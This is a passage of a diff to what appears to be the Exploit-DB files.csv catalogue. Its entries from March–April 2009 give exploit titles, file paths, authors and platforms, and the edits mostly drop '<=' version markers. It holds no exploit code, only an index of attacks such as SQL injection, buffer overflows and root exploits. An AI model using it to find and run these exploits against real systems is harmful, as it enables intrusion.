Vulnerabilities",2009-03-09,"Salvatore Fresta",php,webapps,0 @@ -7706,16 +7706,16 @@ id,file,description,date,author,platform,type,port 8187,platforms/hardware/dos/8187.sh,"Addonics NAS Adapter Post-Auth Denial of Service Exploit",2009-03-09,h00die,hardware,dos,0 8188,platforms/php/webapps/8188.txt,"CMS WEBjump! Multiple SQL Injection Vulnerabilities",2009-03-10,M3NW5,php,webapps,0 8189,platforms/windows/local/8189.txt,"VUPlayer 2.49 - (.cue) Universal Buffer Overflow Exploit",2009-03-10,Stack,windows,local,0 -8190,platforms/windows/dos/8190.txt,"IBM Director <= 5.20.3su2 CIM Server Remote DoS",2009-03-10,"Bernhard Mueller",windows,dos,0 +8190,platforms/windows/dos/8190.txt,"IBM Director 5.20.3su2 CIM Server Remote DoS",2009-03-10,"Bernhard Mueller",windows,dos,0 8191,platforms/multiple/remote/8191.txt,"NextApp Echo < 2.1.1 XML Injection",2009-03-10,"SEC Consult",multiple,remote,0 8193,platforms/windows/local/8193.py,"RainbowPlayer 0.91 - (playlist) Universal SEH Overwrite Exploit",2009-03-10,His0k4,windows,local,0 8194,platforms/php/webapps/8194.txt,"PHP-Fusion Mod Book Panel (course_id) SQL Injection",2009-03-10,SuB-ZeRo,php,webapps,0 -8195,platforms/php/webapps/8195.txt,"WeBid <= 0.7.3 RC9 - Multiple Remote File Inclusion Vulnerabilities",2009-03-10,K-159,php,webapps,0 +8195,platforms/php/webapps/8195.txt,"WeBid 0.7.3 RC9 - Multiple Remote File Inclusion Vulnerabilities",2009-03-10,K-159,php,webapps,0 8196,platforms/php/webapps/8196.txt,"WordPress MU < 2.7 - 'HOST' HTTP Header XSS",2009-03-10,"Juan Galiana Lara",php,webapps,0 8197,platforms/php/webapps/8197.txt,"Joomla Djice Shoutbox 1.0 Permanent XSS",2009-03-10,XaDoS,php,webapps,0 -8198,platforms/php/webapps/8198.pl,"RoomPHPlanning <= 1.6 - (userform.php) Create Admin User Exploit",2009-03-10,"Jonathan Salwan",php,webapps,0 +8198,platforms/php/webapps/8198.pl,"RoomPHPlanning 1.6 - (userform.php) Create Admin User Exploit",2009-03-10,"Jonathan Salwan",php,webapps,0 8200,platforms/windows/remote/8200.pl,"GuildFTPd FTP Server 0.999.14 - Remote Delete Files Exploit",2009-03-10,"Jonathan Salwan",windows,remote,0 -8201,platforms/windows/local/8201.pl,"Foxit Reader <= 3.0 (Build 1301) - PDF Buffer Overflow Exploit (Univ.)",2009-03-13,SkD,windows,local,0 +8201,platforms/windows/local/8201.pl,"Foxit Reader 3.0 (Build 1301) - PDF Buffer Overflow Exploit (Univ.)",2009-03-13,SkD,windows,local,0 8202,platforms/php/webapps/8202.htm,"Traidnt up 2.0 - (Cookie) Add Extension Bypass Exploit",2009-03-11,SP4rT,php,webapps,0 8203,platforms/windows/remote/8203.pl,"POP Peeper 3.4.0.0 Date Remote Buffer Overflow Exploit",2009-03-12,"Jeremy Brown",windows,remote,0 8204,platforms/php/webapps/8204.txt,"phpmysport 1.4 - (XSS/SQL) Multiple Vulnerabilities",2009-03-12,XaDoS,php,webapps,0 @@ -7724,12 +7724,12 @@ id,file,description,date,author,platform,type,port 8207,platforms/php/webapps/8207.txt,"YAP 1.1.1 - (index.php page) Local File Inclusion",2009-03-13,Alkindiii,php,webapps,0 8208,platforms/windows/remote/8208.html,"Morovia Barcode ActiveX 3.6.2 - (MrvBarCd.dll) Insecure Method Exploit",2009-03-13,Cyber-Zone,windows,remote,0 8209,platforms/php/webapps/8209.txt,"Kim Websites 1.0 - (Auth Bypass) SQL Injection",2009-03-13,"Virangar Security",php,webapps,0 -8210,platforms/php/webapps/8210.txt,"UBB.threads 5.5.1 - (message) Remote SQL Injection",2009-03-16,s4squatch,php,webapps,0 +8210,platforms/php/webapps/8210.txt,"UBB.threads 5.5.1 - (message) SQL Injection",2009-03-16,s4squatch,php,webapps,0 8211,platforms/windows/remote/8211.pl,"Serv-U 7.4.0.1 - (MKD) Create Arbitrary Directories Exploit",2009-03-16,"Jonathan Salwan",windows,remote,0 8212,platforms/windows/dos/8212.pl,"Serv-U 7.4.0.1 - (SMNT) Denial of Service Exploit (post auth)",2009-03-16,"Jonathan Salwan",windows,dos,0 8213,platforms/windows/dos/8213.pl,"VLC 0.9.8a Web UI (input) Remote Denial of Service Exploit",2009-03-16,TheLeader,windows,dos,0 8214,platforms/windows/local/8214.c,"Rosoft Media Player 4.2.1 - Local Buffer Overflow Exploit (multi target)",2009-03-16,SimO-s0fT,windows,local,0 -8215,platforms/windows/remote/8215.txt,"PPLive <= 1.9.21 - (/LoadModule) URI Handlers Argument Injection",2009-03-16,Nine:Situations:Group,windows,remote,0 +8215,platforms/windows/remote/8215.txt,"PPLive 1.9.21 - (/LoadModule) URI Handlers Argument Injection",2009-03-16,Nine:Situations:Group,windows,remote,0 8216,platforms/php/webapps/8216.txt,"Beerwin's PHPLinkAdmin 1.0 - RFI/SQL Injection Vulnerabilities",2009-03-16,SirGod,php,webapps,0 8217,platforms/php/webapps/8217.txt,"YAP 1.1.1 - Blind SQL Injection/SQL Injection Vulnerabilities",2009-03-16,SirGod,php,webapps,0 8219,platforms/multiple/dos/8219.html,"Mozilla Firefox 3.0.7 OnbeforeUnLoad DesignMode Dereference Crash",2009-03-16,Skylined,multiple,dos,0 @@ -7738,9 +7738,9 @@ id,file,description,date,author,platform,type,port 8225,platforms/windows/dos/8225.py,"Gretech GOM Encoder 1.0.0.11 - (.Subtitle) Buffer Overflow PoC",2009-03-16,"Encrypt3d.M!nd ",windows,dos,0 8226,platforms/php/webapps/8226.txt,"PHPRunner 4.2 - (SearchOption) Blind SQL Injection",2009-03-17,BugReport.IR,php,webapps,0 8227,platforms/windows/remote/8227.pl,"Talkative IRC 0.4.4.16 - Remote Stack Overflow Exploit (SEH)",2009-03-17,LiquidWorm,windows,remote,0 -8228,platforms/php/webapps/8228.txt,"GDL 4.x - (node) Remote SQL Injection",2009-03-17,g4t3w4y,php,webapps,0 +8228,platforms/php/webapps/8228.txt,"GDL 4.x - (node) SQL Injection",2009-03-17,g4t3w4y,php,webapps,0 8229,platforms/php/webapps/8229.txt,"WordPress Plugin fMoblog 2.1 - (id) SQL Injection",2009-03-17,"strange kevin",php,webapps,0 -8230,platforms/php/webapps/8230.txt,"Mega File Hosting Script 1.2 - (cross.php url) RFI",2009-03-17,Garry,php,webapps,0 +8230,platforms/php/webapps/8230.txt,"Mega File Hosting Script 1.2 - (cross.php url) Remote File Inclusion",2009-03-17,Garry,php,webapps,0 8231,platforms/windows/local/8231.php,"CDex 1.70b2 - (.ogg) Local Buffer Overflow Exploit (xp/ sp3)",2009-03-18,Nine:Situations:Group,windows,local,0 8232,platforms/windows/dos/8232.py,"Chasys Media Player 1.1 - (.pls) Local Buffer Overflow PoC (SEH)",2009-03-18,zAx,windows,dos,0 8233,platforms/windows/local/8233.py,"Chasys Media Player 1.1 - (.pls) Local Stack Overflow Exploit",2009-03-18,His0k4,windows,local,0 @@ -7750,7 +7750,7 @@ id,file,description,date,author,platform,type,port 8237,platforms/php/webapps/8237.txt,"facil-cms 0.1rc2 - Multiple Vulnerabilities",2009-03-18,any.zicky,php,webapps,0 8238,platforms/php/webapps/8238.txt,"Advanced Image Hosting (AIH) 2.3 - (gal) Blind SQL Injection",2009-03-18,boom3rang,php,webapps,0 8239,platforms/php/webapps/8239.txt,"Pivot 1.40.6 - Remote Arbitrary File Deletion",2009-03-18,"Alfons Luja",php,webapps,0 -8240,platforms/php/webapps/8240.txt,"DeluxeBB <= 1.3 - (qorder) Remote SQL Injection",2009-03-18,girex,php,webapps,0 +8240,platforms/php/webapps/8240.txt,"DeluxeBB 1.3 - (qorder) SQL Injection",2009-03-18,girex,php,webapps,0 8241,platforms/multiple/dos/8241.txt,"ModSecurity < 2.5.9 - Remote Denial of Service",2009-03-19,"Juan Galiana Lara",multiple,dos,0 8242,platforms/windows/local/8242.rb,"Chasys Media Player 1.1 - (.cue) Stack Overflow Exploit",2009-03-19,Stack,windows,local,0 8243,platforms/php/webapps/8243.txt,"bloginator 1a - (cookie bypass/SQL) Multiple Vulnerabilities",2009-03-19,Fireshot,php,webapps,0 @@ -7759,7 +7759,7 @@ id,file,description,date,author,platform,type,port 8246,platforms/windows/local/8246.pl,"Chasys Media Player - (.lst playlist) Local Buffer Overflow Exploit",2009-03-19,zAx,windows,local,0 8247,platforms/cgi/webapps/8247.txt,"Hannon Hill Cascade Server - Command Execution (Post Auth)",2009-03-19,"Emory University",cgi,webapps,0 8248,platforms/windows/remote/8248.py,"POP Peeper 3.4.0.0 - (From) Remote Buffer Overflow Exploit (SEH)",2009-03-20,His0k4,windows,remote,0 -8249,platforms/windows/local/8249.php,"BS.Player <= 2.34 Build 980 - (.bsl) Local Buffer Overflow Exploit (SEH)",2009-03-20,Nine:Situations:Group,windows,local,0 +8249,platforms/windows/local/8249.php,"BS.Player 2.34 Build 980 - (.bsl) Local Buffer Overflow Exploit (SEH)",2009-03-20,Nine:Situations:Group,windows,local,0 8250,platforms/windows/local/8250.txt,"CloneCD/DVD ElbyCDIO.sys < 6.0.3.2 - Local Privilege Escalation Exploit",2009-03-20,"NT Internals",windows,local,0 8251,platforms/windows/local/8251.py,"BS.Player 2.34 - (.bsl) Universal SEH Overwrite Exploit",2009-03-20,His0k4,windows,local,0 8252,platforms/php/webapps/8252.txt,"pixie CMS - (XSS/SQL) Multiple Vulnerabilities",2009-03-20,"Justin Keane",php,webapps,0 @@ -7772,23 +7772,23 @@ id,file,description,date,author,platform,type,port 8259,platforms/freebsd/dos/8259.c,"FreeBSD 7.x - (Dumping Environment) Local Kernel Panic Exploit",2009-03-23,kokanin,freebsd,dos,0 8260,platforms/hardware/dos/8260.txt,"Gigaset SE461 WiMAX router Remote Denial of Service Vulnerabilities",2009-03-23,Benkei,hardware,dos,0 8261,platforms/freebsd/local/8261.c,"FreeBSD 7.0/7.1 - (ktimer) Local Kernel Root Exploit",2009-03-23,mu-b,freebsd,local,0 -8262,platforms/osx/dos/8262.c,"Mac OS X xnu <= 1228.3.13 - (zip-notify) Remote Kernel Overflow PoC",2009-03-23,mu-b,osx,dos,0 -8263,platforms/osx/dos/8263.c,"Mac OS X xnu <= 1228.3.13 - (macfsstat) Local Kernel Memory Leak/DoS",2009-03-23,mu-b,osx,dos,0 -8264,platforms/osx/dos/8264.c,"Mac OS X xnu <= 1228.3.13 - (profil) Kernel Memory Leak/DoS PoC",2009-03-23,mu-b,osx,dos,0 -8265,platforms/osx/dos/8265.c,"Mac OS X xnu <= 1228.x - (vfssysctl) Local Kernel DoS PoC",2009-03-23,mu-b,osx,dos,0 -8266,platforms/osx/local/8266.txt,"Mac OS X xnu <= 1228.x - (hfs-fcntl) Local Kernel Root Exploit",2009-03-23,mu-b,osx,local,0 +8262,platforms/osx/dos/8262.c,"Mac OS X xnu 1228.3.13 - (zip-notify) Remote Kernel Overflow PoC",2009-03-23,mu-b,osx,dos,0 +8263,platforms/osx/dos/8263.c,"Mac OS X xnu 1228.3.13 - (macfsstat) Local Kernel Memory Leak/DoS",2009-03-23,mu-b,osx,dos,0 +8264,platforms/osx/dos/8264.c,"Mac OS X xnu 1228.3.13 - (profil) Kernel Memory Leak/DoS PoC",2009-03-23,mu-b,osx,dos,0 +8265,platforms/osx/dos/8265.c,"Mac OS X xnu 1228.x - (vfssysctl) Local Kernel DoS PoC",2009-03-23,mu-b,osx,dos,0 +8266,platforms/osx/local/8266.txt,"Mac OS X xnu 1228.x - (hfs-fcntl) Local Kernel Root Exploit",2009-03-23,mu-b,osx,local,0 8267,platforms/windows/local/8267.py,"Zinf Audio Player 2.2.1 - (.pls) Universal Seh Overwrite Exploit",2009-03-23,His0k4,windows,local,0 8268,platforms/php/webapps/8268.php,"PHPizabi 0.848b C1 HFP1-3 - Remote Command Execution Exploit",2009-03-23,YOUCODE,php,webapps,0 8269,platforms/hardware/remote/8269.txt,"Rittal CMC-TC Processing Unit II - Multiple Vulnerabilities",2009-03-23,"Louhi Networks",hardware,remote,0 8270,platforms/windows/local/8270.pl,"eXeScope 6.50 - Local Buffer Overflow Exploit",2009-03-23,Koshi,windows,local,0 8271,platforms/php/webapps/8271.php,"Pluck CMS 4.6.1 - (module_pages_site.php post) LFI Exploit",2009-03-23,"Alfons Luja",php,webapps,0 -8272,platforms/php/webapps/8272.pl,"Codice CMS 2 - Remote SQL Command Execution Exploit",2009-03-23,darkjoker,php,webapps,0 +8272,platforms/php/webapps/8272.pl,"Codice CMS 2 - SQL Command Execution Exploit",2009-03-23,darkjoker,php,webapps,0 8273,platforms/windows/remote/8273.c,"Telnet-Ftp Service Server 1.x - (Post Auth) Multiple Vulnerabilities",2009-03-23,"Jonathan Salwan",windows,remote,0 8274,platforms/windows/local/8274.pl,"POP Peeper 3.4.0.0 - (.eml) Universal SEH Overwrite Exploit",2009-03-23,Stack,windows,local,0 8275,platforms/windows/local/8275.pl,"POP Peeper 3.4.0.0 - (.htm)l Universal SEH Overwrite Exploit",2009-03-23,Stack,windows,local,0 8276,platforms/php/webapps/8276.pl,"Syzygy CMS 0.3 - LFI/SQL Command Injection Exploit",2009-03-23,Osirys,php,webapps,0 8277,platforms/php/webapps/8277.txt,"Free Arcade Script 1.0 - Auth Bypass (SQL) / Upload Shell Vulnerabilities",2009-03-23,Mr.Skonnie,php,webapps,0 -8278,platforms/php/webapps/8278.txt,"Jinzora Media Jukebox <= 2.8 - (name) Local File Inclusion",2009-03-24,dun,php,webapps,0 +8278,platforms/php/webapps/8278.txt,"Jinzora Media Jukebox 2.8 - (name) Local File Inclusion",2009-03-24,dun,php,webapps,0 8279,platforms/php/webapps/8279.txt,"PHPizabi 0.848b C1 HFP1 - Remote Privilege Escalation",2009-03-24,Nine:Situations:Group,php,webapps,0 8280,platforms/windows/local/8280.txt,"Adobe Acrobat Reader - JBIG2 Universal Exploit (Bind Shell Port 5500)",2009-03-24,"Black Security",windows,local,0 8281,platforms/windows/dos/8281.txt,"Microsoft GdiPlus - EMF GpFont.SetData Integer Overflow PoC",2009-03-24,"Black Security",windows,dos,0 @@ -7803,7 +7803,7 @@ id,file,description,date,author,platform,type,port 8291,platforms/php/webapps/8291.txt,"acute control panel 1.0.0 - (SQL/RFI) Multiple Vulnerabilities",2009-03-26,SirGod,php,webapps,0 8292,platforms/php/webapps/8292.txt,"Simply Classified 0.2 - (category_id) SQL Injection",2009-03-27,G4N0K,php,webapps,0 8293,platforms/php/webapps/8293.txt,"Free PHP Petition Signing Script (Auth Bypass) - SQL Injection",2009-03-27,Qabandi,php,webapps,0 -8294,platforms/windows/dos/8294.c,"XM Easy Personal FTP Server <= 5.7.0 - (NLST) DoS Exploit",2009-03-27,"Jonathan Salwan",windows,dos,0 +8294,platforms/windows/dos/8294.c,"XM Easy Personal FTP Server 5.7.0 - (NLST) DoS Exploit",2009-03-27,"Jonathan Salwan",windows,dos,0 8295,platforms/windows/remote/8295.pl,"FreeSSHd 1.2.1 - (rename) Remote Buffer Overflow Exploit (SEH)",2009-03-27,r0ut3r,windows,remote,22 8296,platforms/php/webapps/8296.txt,"Arcadwy Arcade Script (username) Static XSS",2009-03-27,"Anarchy Angel",php,webapps,0 8297,platforms/php/webapps/8297.txt,"Moodle < 1.6.9/1.7.7/1.8.9/1.9.5 File Disclosure",2009-03-27,"Christian J. Eibl",php,webapps,0 @@ -7811,13 +7811,13 @@ id,file,description,date,author,platform,type,port 8299,platforms/windows/local/8299.py,"Abee Chm Maker 1.9.5 - (.CMP) Stack Overflow Exploit",2009-03-27,"Encrypt3d.M!nd ",windows,local,0 8300,platforms/windows/dos/8300.py,"PowerCHM 5.7 - (.hhp) Stack Overflow poC",2009-03-27,"Encrypt3d.M!nd ",windows,dos,0 8301,platforms/windows/local/8301.pl,"PowerCHM 5.7 - (hhp) Local Buffer Overflow Exploit",2009-03-29,LiquidWorm,windows,local,0 -8302,platforms/php/webapps/8302.php,"glFusion <= 1.1.2 COM_applyFilter()/order SQL Injection Exploit",2009-03-29,Nine:Situations:Group,php,webapps,0 +8302,platforms/php/webapps/8302.php,"glFusion 1.1.2 COM_applyFilter()/order SQL Injection Exploit",2009-03-29,Nine:Situations:Group,php,webapps,0 8303,platforms/linux/local/8303.c,"pam-krb5 < 3.13 - Local Privilege Escalation Exploit",2009-03-29,"Jon Oberheide",linux,local,0 8304,platforms/php/webapps/8304.txt,"Arcadwy Arcade Script - (Auth Bypass) Insecure Cookie Handling",2009-03-29,ZoRLu,php,webapps,0 -8305,platforms/php/webapps/8305.txt,"iWare CMS 5.0.4 - Multiple Remote SQL Injection Vulnerabilities",2009-03-29,boom3rang,php,webapps,0 +8305,platforms/php/webapps/8305.txt,"iWare CMS 5.0.4 - Multiple SQL Injection Vulnerabilities",2009-03-29,boom3rang,php,webapps,0 8306,platforms/windows/dos/8306.txt,"Firefox 3.0.x - (XML Parser) Memory Corruption / DoS PoC",2009-03-30,"Wojciech Pawlikowski",windows,dos,0 8307,platforms/asp/webapps/8307.txt,"Diskos CMS Manager - (SQL/DB/Auth Bypass) Multiple Vulnerabilities",2009-03-30,AnGeL25dZ,asp,webapps,0 -8308,platforms/multiple/dos/8308.c,"Wireshark <= 1.0.6 PN-DCP Format String Exploit PoC",2009-03-30,"THCX Labs",multiple,dos,0 +8308,platforms/multiple/dos/8308.c,"Wireshark 1.0.6 PN-DCP Format String Exploit PoC",2009-03-30,"THCX Labs",multiple,dos,0 8309,platforms/php/webapps/8309.txt,"BandSite CMS 1.1.4 - (members.php memid) SQL Injection",2009-03-30,SirGod,php,webapps,0 8310,platforms/windows/dos/8310.pl,"Sami HTTP Server 2.x - (HEAD) Remote Denial of Service Exploit",2009-03-30,"Jonathan Salwan",windows,dos,0 8311,platforms/windows/local/8311.py,"Abee Chm eBook Creator 2.11 - (FileName) Local Stack Overflow Exploit",2009-03-30,"Encrypt3d.M!nd ",windows,local,0 @@ -7827,19 +7827,19 @@ id,file,description,date,author,platform,type,port 8315,platforms/php/webapps/8315.txt,"gravy media CMS 1.07 - Multiple Vulnerabilities",2009-03-30,x0r,php,webapps,0 8316,platforms/hardware/remote/8316.txt,"NOKIA Siemens FlexiISN 3.1 - Multiple Auth Bypass Vulnerabilities",2009-03-30,TaMBaRuS,hardware,remote,0 8317,platforms/php/webapps/8317.pl,"X-Forum 0.6.2 - Remote Command Execution Exploit",2009-03-30,Osirys,php,webapps,0 -8318,platforms/php/webapps/8318.txt,"JobHut <= 1.2 - (pk) Remote SQL Injection",2009-03-30,K-159,php,webapps,0 +8318,platforms/php/webapps/8318.txt,"JobHut 1.2 - (pk) SQL Injection",2009-03-30,K-159,php,webapps,0 8319,platforms/php/webapps/8319.txt,"family connection 1.8.1 - Multiple Vulnerabilities",2009-03-30,"Salvatore Fresta",php,webapps,0 8320,platforms/multiple/dos/8320.py,"Opera 9.64 - (7400 nested elements) XML Parsing Remote Crash Exploit",2009-03-30,"Ahmed Obied",multiple,dos,0 8321,platforms/windows/remote/8321.py,"Amaya 11.1 W3C Editor/Browser (defer) Stack Overflow Exploit",2009-03-30,"Encrypt3d.M!nd ",windows,remote,0 8322,platforms/windows/local/8322.txt,"Trend Micro Internet Security Pro 2009 - Priviliege Escalation PoC",2009-03-30,b1@ckeYe,windows,local,0 8323,platforms/php/webapps/8323.txt,"Community CMS 0.5 - Multiple SQL Injection Vulnerabilities",2009-03-31,"Salvatore Fresta",php,webapps,0 -8324,platforms/php/webapps/8324.php,"Podcast Generator <= 1.1 - Remote Code Execution Exploit",2009-03-31,BlackHawk,php,webapps,0 +8324,platforms/php/webapps/8324.php,"Podcast Generator 1.1 - Remote Code Execution Exploit",2009-03-31,BlackHawk,php,webapps,0 8325,platforms/windows/dos/8325.py,"Safari 3.2.2/4b (nested elements) XML Parsing Remote Crash Exploit",2009-03-31,"Ahmed Obied",windows,dos,0 -8326,platforms/php/webapps/8326.rb,"VirtueMart <= 1.1.2 - Remote SQL Injection Exploit (Metasploit)",2009-03-31,waraxe,php,webapps,0 -8327,platforms/php/webapps/8327.txt,"virtuemart <= 1.1.2 - Multiple Vulnerabilities",2009-03-31,waraxe,php,webapps,0 -8328,platforms/php/webapps/8328.txt,"webEdition <= 6.0.0.4 - (WE_LANGUAGE) Local File Inclusion",2009-03-31,"Salvatore Fresta",php,webapps,0 +8326,platforms/php/webapps/8326.rb,"VirtueMart 1.1.2 - SQL Injection Exploit (Metasploit)",2009-03-31,waraxe,php,webapps,0 +8327,platforms/php/webapps/8327.txt,"virtuemart 1.1.2 - Multiple Vulnerabilities",2009-03-31,waraxe,php,webapps,0 +8328,platforms/php/webapps/8328.txt,"webEdition 6.0.0.4 - (WE_LANGUAGE) Local File Inclusion",2009-03-31,"Salvatore Fresta",php,webapps,0 8329,platforms/php/webapps/8329.txt,"JobHut 1.2 - Remote Password Change/Delete/Activate User",2009-03-31,"ThE g0bL!N",php,webapps,0 -8330,platforms/php/webapps/8330.txt,"PHPRecipeBook 2.39 - (course_id) Remote SQL Injection",2009-03-31,DarKdewiL,php,webapps,0 +8330,platforms/php/webapps/8330.txt,"PHPRecipeBook 2.39 - (course_id) SQL Injection",2009-03-31,DarKdewiL,php,webapps,0 8331,platforms/php/webapps/8331.txt,"vsp stats processor 0.45 (gamestat.php gameID) - SQL Injection",2009-03-31,Dimi4,php,webapps,0 8332,platforms/windows/remote/8332.txt,"PrecisionID Datamatrix - ActiveX Arbitrary File Overwrite",2009-03-31,DSecRG,windows,remote,0 8333,platforms/multiple/dos/8333.txt,"Sun Calendar Express Web Server - (DoS/XSS) Multiple Remote Vulnerabilities",2009-03-31,"Core Security",multiple,dos,0 @@ -7852,13 +7852,13 @@ id,file,description,date,author,platform,type,port 8340,platforms/windows/remote/8340.py,"XBMC 8.10 - (get tag from file name) Remote Buffer Overflow Exploit",2009-04-01,n00b,windows,remote,80 8341,platforms/php/webapps/8341.txt,"MyioSoft Ajax Portal 3.0 - (page) SQL Injection",2009-04-01,cOndemned,php,webapps,0 8342,platforms/php/webapps/8342.txt,"TinyPHPForum 3.61 File Disclosure / Code Execution Vulnerabilities",2009-04-01,brain[pillow],php,webapps,0 -8343,platforms/windows/local/8343.pl,"UltraISO <= 9.3.3.2685 CCD/IMG Universal Buffer Overflow Exploit",2009-04-03,SkD,windows,local,0 +8343,platforms/windows/local/8343.pl,"UltraISO 9.3.3.2685 CCD/IMG Universal Buffer Overflow Exploit",2009-04-03,SkD,windows,local,0 8344,platforms/multiple/dos/8344.py,"IBM DB2 < 9.5 pack 3a - Connect Denial of Service Exploit",2009-04-03,"Dennis Yurichev",multiple,dos,0 8345,platforms/multiple/dos/8345.py,"IBM DB2 < 9.5 pack 3a - Data Stream Denial of Service Exploit",2009-04-03,"Dennis Yurichev",multiple,dos,0 8346,platforms/php/webapps/8346.txt,"ActiveKB Knowledgebase - (loadpanel.php Panel) Local File Inclusion",2009-04-03,"Angela Chang",php,webapps,0 -8347,platforms/php/webapps/8347.php,"glFusion <= 1.1.2 COM_applyFilter()/cookies Blind SQL Injection Exploit",2009-04-03,Nine:Situations:Group,php,webapps,0 -8348,platforms/php/webapps/8348.txt,"form2list (page.php id) Remote SQL Injection",2009-04-03,Cyber-Zone,php,webapps,0 -8349,platforms/php/webapps/8349.c,"Family Connections <= 1.8.2 - Remote Shell Upload Exploit",2009-04-03,"Salvatore Fresta",php,webapps,0 +8347,platforms/php/webapps/8347.php,"glFusion 1.1.2 COM_applyFilter()/cookies Blind SQL Injection Exploit",2009-04-03,Nine:Situations:Group,php,webapps,0 +8348,platforms/php/webapps/8348.txt,"form2list (page.php id) SQL Injection",2009-04-03,Cyber-Zone,php,webapps,0 +8349,platforms/php/webapps/8349.c,"Family Connections 1.8.2 - Remote Shell Upload Exploit",2009-04-03,"Salvatore Fresta",php,webapps,0 8350,platforms/php/webapps/8350.txt,"Gravity Board X 2.0b SQL Injection / Post Auth Code Execution",2009-04-03,brain[pillow],php,webapps,0 8351,platforms/php/webapps/8351.pl,"AdaptBB 1.0 - (topic_id) SQL Injection / Credentials Disclosure Exploit",2009-04-03,StAkeR,php,webapps,0 8352,platforms/windows/dos/8352.txt,"Amaya 11.1 XHTML Parser Remote Buffer Overflow PoC",2009-04-06,cicatriz,windows,dos,0 @@ -7867,11 +7867,11 @@ id,file,description,date,author,platform,type,port 8355,platforms/php/webapps/8355.txt,"FlexCMS Calendar (ItemId) Blind SQL Injection",2009-04-06,Lanti-Net,php,webapps,0 8356,platforms/windows/dos/8356.txt,"Mozilla Firefox XSL - Parsing Remote Memory Corruption PoC (2)",2009-04-06,DATA_SNIPER,windows,dos,0 8357,platforms/php/webapps/8357.py,"iDB 0.2.5pa SVN 243 - (skin) Local File Inclusion Exploit",2009-04-06,LOTFREE,php,webapps,0 -8358,platforms/windows/dos/8358.pl,"UltraISO <= 9.3.3.2685 - (.ui) Off By One / Buffer Overflow PoC",2009-04-06,Stack,windows,dos,0 +8358,platforms/windows/dos/8358.pl,"UltraISO 9.3.3.2685 - (.ui) Off By One / Buffer Overflow PoC",2009-04-06,Stack,windows,dos,0 8359,platforms/hardware/remote/8359.py,"Pirelli Discus DRG A225 wifi router WPA2PSK Default Algorithm Exploit",2009-04-06,j0rgan,hardware,remote,0 8360,platforms/windows/dos/8360.pl,"Unsniff Network Analyzer 1.0 - (usnf) Local Heap Overflow PoC",2009-04-06,LiquidWorm,windows,dos,0 -8361,platforms/php/webapps/8361.txt,"Family Connections CMS <= 1.8.2 - Blind SQL Injection",2009-04-07,"Salvatore Fresta",php,webapps,0 -8362,platforms/php/webapps/8362.php,"Lanius CMS <= 0.5.2 - Remote Arbitrary File Upload Exploit",2009-04-07,EgiX,php,webapps,0 +8361,platforms/php/webapps/8361.txt,"Family Connections CMS 1.8.2 - Blind SQL Injection",2009-04-07,"Salvatore Fresta",php,webapps,0 +8362,platforms/php/webapps/8362.php,"Lanius CMS 0.5.2 - Remote Arbitrary File Upload Exploit",2009-04-07,EgiX,php,webapps,0 8363,platforms/windows/remote/8363.py,"XBMC 8.10 - (HEAD) Remote Buffer Overflow Exploit (SEH)",2009-04-07,His0k4,windows,remote,80 8364,platforms/php/webapps/8364.txt,"saspcms 0.9 - Multiple Vulnerabilities",2009-04-08,BugReport.IR,php,webapps,0 8365,platforms/php/webapps/8365.txt,"Joomla Component Maian Music 1.2.1 - (category) SQL Injection",2009-04-08,H!tm@N,php,webapps,0 @@ -7882,20 +7882,20 @@ id,file,description,date,author,platform,type,port 8370,platforms/windows/dos/8370.pl,"GOM Player 2.1.16.6134 Subtitle Local Buffer Overflow PoC",2009-04-08,"Bui Quang Minh",windows,dos,0 8371,platforms/windows/local/8371.pl,"OTSTurntables 1.00.027 - (.m3u/.ofl) Universal BoF Exploit",2009-04-08,AlpHaNiX,windows,local,0 8372,platforms/php/webapps/8372.txt,"photo graffix 3.4 - Multiple Vulnerabilities",2009-04-08,ahmadbady,php,webapps,0 -8373,platforms/php/webapps/8373.txt,"Xplode CMS (wrap_script) Remote SQL Injection",2009-04-08,PLATEN,php,webapps,0 +8373,platforms/php/webapps/8373.txt,"Xplode CMS (wrap_script) SQL Injection",2009-04-08,PLATEN,php,webapps,0 8374,platforms/php/webapps/8374.txt,"WebFileExplorer 3.1 - (DB.MDB) Database Disclosure",2009-04-08,ByALBAYX,php,webapps,0 -8376,platforms/php/webapps/8376.php,"Geeklog <= 1.5.2 SEC_authenticate() SQL Injection Exploit",2009-04-09,Nine:Situations:Group,php,webapps,0 +8376,platforms/php/webapps/8376.php,"Geeklog 1.5.2 SEC_authenticate() SQL Injection Exploit",2009-04-09,Nine:Situations:Group,php,webapps,0 8377,platforms/asp/webapps/8377.pl,"Exjune Guestbook 2.0 - Remote Database Disclosure Exploit",2009-04-09,AlpHaNiX,asp,webapps,0 8378,platforms/windows/dos/8378.pl,"SWF Opener 1.3 - (.swf) Off By One Buffer Overflow PoC",2009-04-09,Stack,windows,dos,0 8379,platforms/asp/webapps/8379.txt,"BackendCMS 5.0 - (main.asp id) SQL Injection",2009-04-09,AnGeL25dZ,asp,webapps,0 8380,platforms/php/webapps/8380.txt,"Simbas CMS 2.0 - (Auth Bypass) SQL Injection",2009-04-09,"ThE g0bL!N",php,webapps,0 8382,platforms/php/webapps/8382.txt,"WebFileExplorer 3.1 - (Auth Bypass) SQL Injection",2009-04-09,Osirys,php,webapps,0 8383,platforms/php/webapps/8383.txt,"adaptbb 1.0b - Multiple Vulnerabilities",2009-04-09,"Salvatore Fresta",php,webapps,0 -8384,platforms/linux/remote/8384.txt,"net2ftp <= 0.97 - Cross-Site Scripting/Request Forgery Vulnerabilities",2009-04-09,cicatriz,linux,remote,0 +8384,platforms/linux/remote/8384.txt,"net2ftp 0.97 - Cross-Site Scripting/Request Forgery Vulnerabilities",2009-04-09,cicatriz,linux,remote,0 8385,platforms/php/webapps/8385.txt,"My Dealer CMS 2.0 - (Auth Bypass) SQL Injection",2009-04-09,"ThE g0bL!N",php,webapps,0 8386,platforms/php/webapps/8386.txt,"Absolute Form Processor XE-V 1.5 - (Auth Bypass) SQL Injection",2009-04-09,"ThE g0bL!N",php,webapps,0 8387,platforms/php/webapps/8387.txt,"dynamic flash forum 1.0 beta - Multiple Vulnerabilities",2009-04-09,"Salvatore Fresta",php,webapps,0 -8388,platforms/php/webapps/8388.txt,"PHP-Agenda <= 2.2.5 - Remote File Overwriting Vulnerabilities",2009-04-10,"Salvatore Fresta",php,webapps,0 +8388,platforms/php/webapps/8388.txt,"PHP-Agenda 2.2.5 - Remote File Overwriting Vulnerabilities",2009-04-10,"Salvatore Fresta",php,webapps,0 8389,platforms/php/webapps/8389.txt,"Loggix Project 9.4.5 - (refer_id) Blind SQL Injection",2009-04-10,"Salvatore Fresta",php,webapps,0 